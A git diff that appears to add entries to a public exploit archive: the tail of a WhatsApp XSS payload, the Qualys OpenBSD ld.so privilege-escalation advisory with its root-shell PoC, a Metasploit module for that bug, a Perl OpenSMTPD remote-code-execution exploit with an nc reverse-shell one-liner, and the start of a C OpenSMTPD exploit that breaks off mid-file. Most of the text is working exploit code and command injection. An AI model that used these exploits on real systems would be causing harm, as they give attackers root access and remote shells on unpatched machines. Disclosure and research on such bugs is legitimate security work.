+	    const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
+        const t = await r.text();
+        alert(t);
+    }())
+}())`;
+
+payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
+
+e.__x_matchedText = payload;
+
+e.__x_body = `
+    Innocent text
+
+    ${payload}
+
+    More Innocent text
+`;
+
+// step 6: press F8 in order for the execution to continue
+// result: a message should be sent to the victim that once is clicked will execute the payload above
+
+// further information: https://github.com/weizman/CVE-2019-18426
\ No newline at end of file
diff --git a/exploits/openbsd/local/47780.txt b/exploits/openbsd/local/47780.txt
new file mode 100644
index 000000000..c497f5c05
--- /dev/null
+++ b/exploits/openbsd/local/47780.txt
@@ -0,0 +1,233 @@
+Qualys Security Advisory
+
+Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726)
+
+
+==============================================================================
+Contents
+==============================================================================
+
+Summary
+Analysis
+Demonstration
+Acknowledgments
+
+
+==============================================================================
+Summary
+==============================================================================
+
+We discovered a Local Privilege Escalation in OpenBSD's dynamic loader
+(ld.so): this vulnerability is exploitable in the default installation
+(via the set-user-ID executable chpass or passwd) and yields full root
+privileges.
+
+We developed a simple proof of concept and successfully tested it
+against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both
+amd64 and i386; other releases and architectures are probably also
+exploitable.
+
+
+==============================================================================
+Analysis
+==============================================================================
+
+In this section, we analyze a step-by-step execution of our proof of
+concept:
+
+------------------------------------------------------------------------------
+
+1/ We execve() the set-user-ID /usr/bin/chpass, but first:
+
+   1a/ we set the LD_LIBRARY_PATH environment variable to one single dot
+   (the current working directory) and approximately ARG_MAX colons (the
+   maximum number of bytes for the argument and environment list); as
+   described in man ld.so:
+
+     LD_LIBRARY_PATH
+             A colon separated list of directories, prepending the default
+             search path for shared libraries.  This variable is ignored for
+             set-user-ID and set-group-ID executables.
+
+   1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *)
+   (2MB on amd64, 1MB on i386); as described in man setrlimit:
+
+     RLIMIT_DATA     The maximum size (in bytes) of the data segment for a
+                     process; this includes memory allocated via malloc(3) and
+                     all other anonymous memory mapped via mmap(2).
+
+------------------------------------------------------------------------------
+
+2/ Before the main() function of chpass is executed, the _dl_boot()
+function of ld.so is executed and calls _dl_setup_env():
+
+262 void
+263 _dl_setup_env(const char *argv0, char **envp)
+264 {
+...
+271         _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp));
+...
+283         _dl_trust = !_dl_issetugid();
+284         if (!_dl_trust) {       /* Zap paths if s[ug]id... */
+285                 if (_dl_libpath) {
+286                         _dl_free_path(_dl_libpath);
+287                         _dl_libpath = NULL;
+288                         _dl_unsetenv("LD_LIBRARY_PATH", envp);
+289                 }
+
+------------------------------------------------------------------------------
+
+3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH
+environment variable and passes it to _dl_split_path():
+
+ 23 char **
+ 24 _dl_split_path(const char *searchpath)
+ 25 {
+ ..
+ 35         pp = searchpath;
+ 36         while (*pp) {
+ 37                 if (*pp == ':' || *pp == ';')
+ 38                         count++;
+ 39                 pp++;
+ 40         }
+ ..
+ 45         retval = _dl_reallocarray(NULL, count, sizeof(*retval));
+ 46         if (retval == NULL)
+ 47                 return (NULL);
+
+------------------------------------------------------------------------------
+
+4/ At line 45, count is approximately ARG_MAX (the number of colons in
+our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our
+low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL.
+
+------------------------------------------------------------------------------
+
+5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH
+is ignored, but it is not deleted from the environment (CVE-2019-19726):
+although _dl_trust is false (_dl_issetugid() returns true because chpass
+is set-user-ID), _dl_unsetenv() is not called (line 288) because
+_dl_libpath is NULL (line 285).
+
+------------------------------------------------------------------------------
+
+6/ Next, the main() function of chpass is executed, and it:
+
+   6a/ calls setuid(0), which sets the real and effective user IDs to 0;
+
+   6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY;
+
+   6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb
+   (unlike execve(), execv() does not reset the environment).
+
+------------------------------------------------------------------------------
+
+7/ Before the main() function of pwd_mkdb is executed, the _dl_boot()
+function of ld.so is executed and calls _dl_setup_env():
+
+   7a/ at line 271, _dl_getenv() returns a pointer to our
+   LD_LIBRARY_PATH environment variable (because it was not deleted from
+   the environment in step 5, and because execv() did not reset the
+   environment in step 6c);
+
+   7b/ at line 45, _dl_reallocarray() does not return NULL anymore
+   (because our low RLIMIT_DATA was reset in step 6b);
+
+   7c/ as a result, _dl_libpath is not NULL (line 271), and it is not
+   reset to NULL (line 287) because _dl_trust is true (_dl_issetugid()
+   returns false because pwd_mkdb is not set-user-ID, and because the
+   real and effective user IDs were both set to 0 in step 6a): our
+   LD_LIBRARY_PATH is not ignored anymore.
+
+------------------------------------------------------------------------------
+
+8/ Finally, ld.so searches for shared libraries in _dl_libpath (our
+LD_LIBRARY_PATH) and loads our own library from the current working
+directory (the dot in our LD_LIBRARY_PATH).
+
+------------------------------------------------------------------------------
+
+
+==============================================================================
+Demonstration
+==============================================================================
+
+In this section, we demonstrate the use of our proof of concept:
+
+------------------------------------------------------------------------------
+
+$ id
+uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+
+$ cd /tmp
+
+$ cat > lib.c << "EOF"
+#include <paths.h>
+#include <unistd.h>
+
+static void __attribute__ ((constructor)) _init (void) {
+    if (setuid(0) != 0) _exit(__LINE__);
+    if (setgid(0) != 0) _exit(__LINE__);
+    char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
+    execve(argv[0], argv, NULL);
+    _exit(__LINE__);
+}
+EOF
+
+$ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED
+ 0x0000000000000001 (NEEDED)             Shared library: [libutil.so.13.1]
+ 0x0000000000000001 (NEEDED)             Shared library: [libc.so.95.1]
+
+$ gcc -fpic -shared -s -o libutil.so.13.1 lib.c
+
+$ cat > poc.c << "EOF"
+#include <string.h>
+#include <sys/param.h>
+#include <sys/resource.h>
+#include <unistd.h>
+
+int
+main(int argc, char * const * argv)
+{
+    #define LLP "LD_LIBRARY_PATH=."
+    static char llp[ARG_MAX - 128];
+    memset(llp, ':', sizeof(llp)-1);
+    memcpy(llp, LLP, sizeof(LLP)-1);
+    char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
+
+    #define DATA (ARG_MAX * sizeof(char *))
+    const struct rlimit data = { DATA, DATA };
+    if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
+
+    if (argc <= 1) _exit(__LINE__);
+    argv += 1;
+    execve(argv[0], argv, envp);
+    _exit(__LINE__);
+}
+EOF
+
+$ gcc -s -o poc poc.c
+
+$ ./poc /usr/bin/chpass
+
+# id
+uid=0(root) gid=0(wheel) groups=32767(nobody)
+
+------------------------------------------------------------------------------
+
+
+==============================================================================
+Acknowledgments
+==============================================================================
+
+We thank Theo de Raadt and the OpenBSD developers for their incredibly
+quick response: they published a patch for this vulnerability in less
+than 3 hours. We also thank MITRE's CVE Assignment Team.
+
+
+
+[https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner>
+
+
+
+This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.
\ No newline at end of file
diff --git a/exploits/openbsd/local/47803.rb b/exploits/openbsd/local/47803.rb
new file mode 100755
index 000000000..b880d7651
--- /dev/null
+++ b/exploits/openbsd/local/47803.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenBSD Dynamic Loader chpass Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in the OpenBSD `ld.so`
+        dynamic loader (CVE-2019-19726).
+
+        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
+        environment variable when set with approximately `ARG_MAX` colons.
+
+        This can be abused to load `libutil.so` from an untrusted path,
+        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
+        executable, resulting in privileged code execution.
+
+        This module has been tested successfully on:
+
+        OpenBSD 6.1 (amd64); and
+        OpenBSD 6.6 (amd64)
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Qualys', # Discovery and exploit
+          'bcoles'  # Metasploit
+        ],
+      'DisclosureDate' => '2019-12-11',
+      'Platform'       => %w[bsd unix], # OpenBSD
+      'Arch'           => [ARCH_CMD],
+      'SessionTypes'   => ['shell'],
+      'References'     =>
+        [
+          ['CVE', '2019-19726'],
+          ['EDB', '47780'],
+          ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'],
+          ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'],
+          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'],
+          ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig']
+        ],
+      'Targets'        => [['Automatic', {}]],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'    => 'cmd/unix/reverse',
+          'WfsDelay'   => 10
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def chpass_path
+    datastore['CHPASS_PATH']
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def is_root?
+    (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
+  end
+
+  def libutil_name
+    return unless command_exists? 'readelf'
+    cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first
+  end
+
+  def check
+    patches = cmd_exec('syspatch -l').to_s
+    patch = '013_ldso'
+    if patches.include? patch
+      vprint_error "Patch #{patch} has been installed. Target is not vulnerable."
+      return CheckCode::Safe
+    end
+    vprint_good "Patch #{patch} is not present"
+
+    unless command_exists? 'cc'
+      vprint_error 'cc is not installed'
+      return CheckCode::Safe
+    end
+    print_good 'cc is installed'
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9
+    lib_data = <<-EOF
+#include <paths.h>
+#include <unistd.h>
+
+static void __attribute__ ((constructor)) _init (void) {
+    if (setuid(0) != 0) _exit(__LINE__);
+    if (setgid(0) != 0) _exit(__LINE__);
+    char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
+    execve(argv[0], argv, NULL);
+    _exit(__LINE__);
+}
+EOF
+
+    libs = []
+    lib = libutil_name
+    if lib
+      libs << lib
+      print_good "Found libutil.so name: #{lib}"
+    else
+      libs << 'libutil.so.12.1'
+      libs << 'libutil.so.13.1'
+      print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}"
+    end
+
+    lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c"
+    upload lib_src_path, lib_data
+    libs.each do |lib_name|
+      lib_path = "#{base_dir}/#{lib_name}"
+      print_status "Compiling #{lib_path} ..."
+      output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall"
+      register_file_for_cleanup lib_path
+
+      unless output.blank?
+        print_error output
+        fail_with Failure::Unknown, "#{lib_path}.c failed to compile"
+      end
+    end
+
+    # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9
+    exploit_data = <<-EOF
+#include <string.h>
+#include <sys/param.h>
+#include <sys/resource.h>
+#include <unistd.h>
+
+int
+main(int argc, char * const * argv)
+{
+    #define LLP "LD_LIBRARY_PATH=."
+    static char llp[ARG_MAX - 128];
+    memset(llp, ':', sizeof(llp)-1);
+    memcpy(llp, LLP, sizeof(LLP)-1);
+    char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
+
+    #define DATA (ARG_MAX * sizeof(char *))
+    const struct rlimit data = { DATA, DATA };
+    if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
+
+    if (argc <= 1) _exit(__LINE__);
+    argv += 1;
+    execve(argv[0], argv, envp);
+    _exit(__LINE__);
+}
+EOF
+
+    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload "#{exploit_path}.c", exploit_data
+    print_status "Compiling #{exploit_path} ..."
+    output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall"
+    register_file_for_cleanup exploit_path
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
+    end
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload payload_path, "#!/bin/sh\n#{payload.encoded}\n"
+    chmod payload_path
+
+    print_status 'Launching exploit...'
+    output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}")
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end
\ No newline at end of file
diff --git a/exploits/openbsd/remote/48051.pl b/exploits/openbsd/remote/48051.pl
new file mode 100755
index 000000000..35cb0f533
--- /dev/null
+++ b/exploits/openbsd/remote/48051.pl
@@ -0,0 +1,155 @@
+# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
+# Date: 2020-02-02
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.opensmtpd.org/
+# Version: OpenSMTPD 6.4.0 - 6.6.1
+# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
+# CVE: CVE-2020-7247
+
+#!/usr/bin/perl
+
+#
+# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
+# Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
+# other products, allows remote attackers to execute arbitrary commands as root
+# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
+# FROM field. This affects the "uncommented" default configuration. The issue
+# exists because of an incorrect return value upon failure of input validation
+# (CVE-2020-7247).
+#
+# "Wow. I feel all butterflies in my tummy that bugs like this still exist. 
+# That's awesome :)" -- skyper
+#
+# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
+# root on OpenBSD in the default configuration, or execute remote commands as 
+# root (only in OpenSMTPD "uncommented" default configuration).
+#
+# See also:
+# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
+# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
+# https://www.kb.cert.org/vuls/id/390745/
+# https://www.opensmtpd.org/security.html
+#
+# Usage (LPE):
+# phish$ uname -a
+# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
+# phish$ id
+# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
+# phish$ ./raptor_opensmtpd.pl LPE
+# [...]
+# Payload sent, please wait 5 seconds...
+# -rwsrwxrwx  1 root  wheel  12432 Feb  1 21:20 /usr/local/bin/pwned
+# phish# id
+# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
+#
+# Usage (RCE):
+# raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
+# [...]
+# Payload sent, please wait 5 seconds...
+# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
+# /bin/sh: Can't find tty file descriptor
+# /bin/sh: warning: won't have full job control
+# phish# id
+# uid=0(root) gid=0(wheel) groups=0(wheel)
+#
+# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
+# OpenBSD 6.6 [tested]
+# OpenBSD 6.5 [untested]
+# OpenBSD 6.4 [untested]
+# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
+# Other Linux distributions [untested]
+# FreeBSD [untested]
+# NetBSD [untested]
+# 
+
+use IO::Socket::INET;
+
+print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
+print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";
+
+$usage = "Usage:\n".
+"$0 LPE\n".
+"$0 RCE <remote_host> <local_host> [<domain>]\n";
+$lport = 4444;
+
+($type, $rhost, $lhost, $domain) = @ARGV;
+die $usage if (($type ne "LPE") && ($type ne "RCE"));
+
+# Prepare the payload
+if ($type eq "LPE") { # LPE
+	$payload = "cp /bin/sh /usr/local/bin/pwned\n".
+	"echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n".
+	"gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
+	$rhost = "127.0.0.1";
+} else { # RCE
+	die $usage if ((not defined $rhost) || (not defined $lhost));
+	$payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|".
+	"nc $lhost $lport >/tmp/f";
+}
+
+# Open SMTP connection
+$| = 1;
+$s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n";
+
+# Read SMTP banner
+$r = <$s>;
+print "< $r";
+die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);
+
+# Send HELO
+$w = "HELO fnord";
+print "> $w\n";
+print $s "$w\n";
+$r = <$s>;
+print "< $r";
+die "Error: expected 250\n" if ($r !~ /^250/);
+
+# Send evil MAIL FROM
+$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
+print "> $w\n";
+print $s "$w\n";
+$r = <$s>;
+print "< $r";
+die "Error: expected 250\n" if ($r !~ /^250/);
+
+# Send RCPT TO
+if (not defined $domain) {
+	$rcpt = "<root>";
+} else {
+	$rcpt = "<root\@$domain>";
+}
+$w = "RCPT TO:$rcpt";
+print "> $w\n";
+print $s "$w\n";
+$r = <$s>;
+print "< $r";
+die "Error: expected 250\n" if ($r !~ /^250/);
+
+# Send payload in DATA
+$w = "DATA";
+print "> $w\n";
+print $s "$w\n";
+$r = <$s>;
+print "< $r";
+$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
+#print "> $w\n"; # uncomment for debugging
+print $s "$w\n";
+$r = <$s>;
+print "< $r";
+die "Error: expected 250\n" if ($r !~ /^250/);
+
+# Close SMTP connection
+$s->close();
+print "\nPayload sent, please wait 5 seconds...\n";
+
+# Got root?
+if ($type eq "LPE") { # LPE
+	sleep 5;
+	print `ls -l /usr/local/bin/pwned`;
+	exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
+} else { # RCE
+	exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
+	#exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
+}
\ No newline at end of file
diff --git a/exploits/openbsd/remote/48140.c b/exploits/openbsd/remote/48140.c
new file mode 100644
index 000000000..9ae0ba6d4
--- /dev/null
+++ b/exploits/openbsd/remote/48140.c
@@ -0,0 +1,426 @@
+/*
+ * LPE and RCE in OpenSMTPD's default install (CVE-2020-8794)
+ * Copyright (C) 2020 Qualys, Inc.
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <https://www.gnu.org/licenses/>.
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netinet/tcp.h>
+#include <netdb.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+static enum {
+    CLIENT_SIDE_EXPLOIT,
+    SERVER_SIDE_EXPLOIT,
+} exploit = CLIENT_SIDE_EXPLOIT;
+
+static enum {
+    NEW_SMTPD_GRAMMAR,
+    OLD_SMTPD_GRAMMAR,
+} grammar = NEW_SMTPD_GRAMMAR;
+
+static struct {
+    const char * command;
+    const char * user;
+    const char * dispatcher;
+    const char * maildir;
+    char lines[512];
+} inject = {
+    .command = "X=`mktemp /tmp/x.XXXXXX`&&id>>$X;exit 0",
+    .user = "root",
+    .dispatcher = "local_mail",
+    .maildir = NULL,
+};
+
+#define die() do { \
+    printf("died in %s: %u\n", __func__, __LINE__); \
+    exit(EXIT_FAILURE); \
+} while (0)
+
+static struct addrinfo *
+common_getaddrinfo(const char * const host, const char * const port)
+{
+    const struct addrinfo hints = {
+        .ai_family = AF_INET,
+        .ai_socktype = SOCK_STREAM,
+        .ai_protocol = IPPROTO_TCP,
+        .ai_flags = AI_NUMERICHOST | AI_NUMERICSERV,
+    };
+    struct addrinfo * addr = NULL;
+    if (getaddrinfo(host, port, &hints, &addr) != 0) die();
+    if (addr == NULL || addr->ai_next != NULL) die();
+    return addr;
+}
+
+static const char *
+common_getnameinfo(const struct sockaddr * const addr, const socklen_t addr_len)
+{
+    static char host[NI_MAXHOST];
+    static char port[NI_MAXSERV];
+    if (getnameinfo(addr, addr_len, host, sizeof(host), port, sizeof(port),
+        NI_NUMERICHOST | NI_NUMERICSERV) != 0) die();
+
+    static char host_port[NI_MAXHOST + NI_MAXSERV];
+    if (snprintf(host_port, sizeof(host_port), "%s:%s", host, port) <= 0) die();
+    return host_port;
+}
+
+static void
+common_send(const int fd, const char * const format, va_list ap)
+{
+    if (fd <= -1) die();
+    static char buf[1024];
+    const int len = vsnprintf(buf, sizeof(buf), format, ap);
+    if (len <= 0 || (unsigned)len >= sizeof(buf)) die();
+    printf("--> %s%s", buf, buf[len-1] != '\n' ? "\n" : "");
+
+    const char * data = buf;
+    size_t size = len;
+
+    for (;;) {
+        const ssize_t sent = send(fd, data, size, MSG_NOSIGNAL);
+        if (sent <= 0) die();
+        if ((size_t)sent > size) die();
+        data += sent;
+        size -= sent;
+        if (size <= 0) return;
+    }
+    die();
+}
+
+static int listen_fd = -1;
+
+static void
+server_listen(void)
+{
+    if (listen_fd != -1) die();
+    const struct addrinfo * const addr = common_getaddrinfo("0.0.0.0", "25");
+    listen_fd = socket(addr->ai_family, addr->ai_socktype, addr->ai_protocol);
+    if (listen_fd <= -1) die();
+
+    const int on = 1;
+    if (setsockopt(listen_fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) != 0) die();
+    if (bind(listen_fd, addr->ai_addr, addr->ai_addrlen) != 0) die();
+    if (listen(listen_fd, 10) != 0) die();
+
+    printf("\nListening on %s\n",
+        common_getnameinfo(addr->ai_addr, addr->ai_addrlen));
+}
+
+static int server_fd = -1;
+
+static void
+server_accept(void)
+{
+    struct sockaddr addr;
+    socklen_t addr_len = sizeof(addr);
+
+    if (listen_fd <= -1) die();
+    if (server_fd != -1) die();
+    server_fd = accept(listen_fd, &addr, &addr_len);
+    if (server_fd <= -1) die();
+    if (addr_len > sizeof(addr)) die();
+
+    const time_t now = time(NULL);
+    printf("\nConnection from %s\n%s",
+        common_getnameinfo(&addr, addr_len), ctime(&now));
+
+    const int on = 1;
+    if (setsockopt(server_fd, IPPROTO_TCP, TCP_NODELAY, &on, sizeof(on)) != 0) die();
+}
+
+static void
+server_send(const char * const format, ...)
+{
+    if (server_fd <= -1) die();
+
+    va_list ap;
+    va_start(ap, format);
+    common_send(server_fd, format, ap);
+    va_end(ap);
+}
+
+static char server_command[1024];
+
+static void
+server_recv(const char * const prefix)
+{
+    if (server_fd <= -1) die();
+    const size_t prefix_len = strlen(prefix);
+    if (prefix_len < 4) die();
+
+    char * data = server_command;
+    size_t size = sizeof(server_command);
+
+    for (;;) {
+        const ssize_t rcvd = recv(server_fd, data, size, 0);
+        if (rcvd <= 0) die();
+        if ((size_t)rcvd >= size) die();
+        data += rcvd;
+        size -= rcvd;
+        data[0] = '\0';
+        if (data[-1] != '\n') continue;
+        if (strchr(server_command, '\n') != data - 1) die();
+
+        printf("<-- %s", server_command);
+        if (strncmp(server_command, prefix, prefix_len) != 0) die();
+        return;
+    }
+    die();
+}
+
+static void
+server_close(void)
+{
+    if (server_fd <= -1) die();
+    if (close(server_fd) != 0) die();
+    server_fd = -1;
+}
+
+static void
+server_session(const char * const inject_lines)
+{
+    const char * const error_code =
+        (exploit == SERVER_SIDE_EXPLOIT) ? "421" : "553";
+
+    server_accept();
+    server_send("220 ent.of.line ESMTP\n");
+
+    server_recv("EHLO ");
+    server_send("250 ent.of.line Hello\n");
+
+    server_recv("MAIL FROM:<");
+    if ((strncmp(server_command, "MAIL FROM:<>", 12) == 0) !=
+        (exploit == SERVER_SIDE_EXPLOIT)) die();
+
+    if (inject_lines != NULL) {
+        if (inject_lines[0] == '\0') die();
+        if (inject_lines[0] == '\n') die();
+        if (inject_lines[strlen(inject_lines)-1] == '\n') die();
+
+        server_send("%s-Error\n", error_code);
+        server_send("%s\n\n%s%c", error_code, inject_lines, (int)'\0');
+
+    } else {
+        server_send("%s Error\n", error_code);
+
+        server_recv("RSET");
+        server_send("250 Reset\n");
+
+        server_recv("QUIT");
+        server_send("221 Bye\n");
+    }
+    server_close();
+}
+
+static const struct addrinfo * client_target = NULL;
+static const char * client_mail = NULL;
+static const char * client_rcpt = NULL;
+
+static int client_fd = -1;
+
+static void
+client_connect(void)
+{
+    if (client_fd != -1) die();
+    client_fd = socket(client_target->ai_family, client_target->ai_socktype,
+        client_target->ai_protocol);
+    if (client_fd <= -1) die();
+
+    if (connect(client_fd, client_target->ai_addr,
+        client_target->ai_addrlen) != 0) die();
+
+    printf("\nConnected to %s\n",
+        common_getnameinfo(client_target->ai_addr, client_target->ai_addrlen));
+}
+
+static void
+client_send(const char * const format, ...)
+{
+    if (client_fd <= -1) die();
+
+    va_list ap;
+    va_start(ap, format);
+    common_send(client_fd, format, ap);
+    va_end(ap);
+}
+
+static char client_reply[1024];
+
+static void
+client_recv(const char * const prefix)
+{
+    if (client_fd <= -1) die();
+    const size_t prefix_len = strlen(prefix);
+    if (prefix_len < 3) die();
+
+    char * data = client_reply;
+    size_t size = sizeof(client_reply);
+    const char * line = data;
+
+    for (;;) {
+        const ssize_t rcvd = recv(client_fd, data, size, 0);
+        if (rcvd <= 0) die();
+        if ((size_t)rcvd >= size) die();
+        data += rcvd;
+        size -= rcvd;
+        data[0] = '\0';
+        if (data[-1] != '\n') continue;
+
+        for (;;) {
+            const char * const new_line = strchr(line, '\n');
+            if (new_line == NULL) break;
+            if (new_line - line < 4) die();
+            printf("<-- %.*s", (int)(new_line - line + 1), line);
+            if (strncmp(line, prefix, prefix_len) != 0) die();
+
+            if (line[3] == ' ') {
+                if (new_line + 1 != data) die();
+                return;
+            }
+            if (line[3] != '-') die();
+            line = new_line + 1;
+        }
+        if (line != data) die();
+    }
+    die();
+}
+
+static void
+client_close(void)
+{
+    if (client_fd <= -1) die();
+    if (close(client_fd) != 0) die();
+    client_fd = -1;
+}
+
+static void
+client_session(void)
+{
+    client_connect();
+    client_recv("220 ");
+
+    client_send("HELP\n");
+    client_recv("214");
+    if (strstr(client_reply, "please contact bugs@openbsd.org") == NULL) die();
+
+    client_send("EHLO ent.of.line\n");
+    client_recv("250");
+    const int dsn = (strstr(client_reply, "250-DSN") != NULL);
+
+    client_send("MAIL FROM:<%s>\n", client_mail);
+    client_recv("250 ");
+
+    client_send("RCPT TO:<%s>%s\n", client_rcpt, dsn ? " NOTIFY=SUCCESS" : "");
+    client_recv("250 ");
+
+    client_send("DATA\n");
+    client_recv("354 Enter mail, end with ");
+
+    if (!dsn) {
+        client_send("Delivered-To: %s\n", client_rcpt);
+    }
+    client_send("\n");
+    client_send(".\n");
+    client_recv("250 ");
+
+    client_send("QUIT\n");
+    client_recv("221 ");
+    client_close();
+}
+
+int
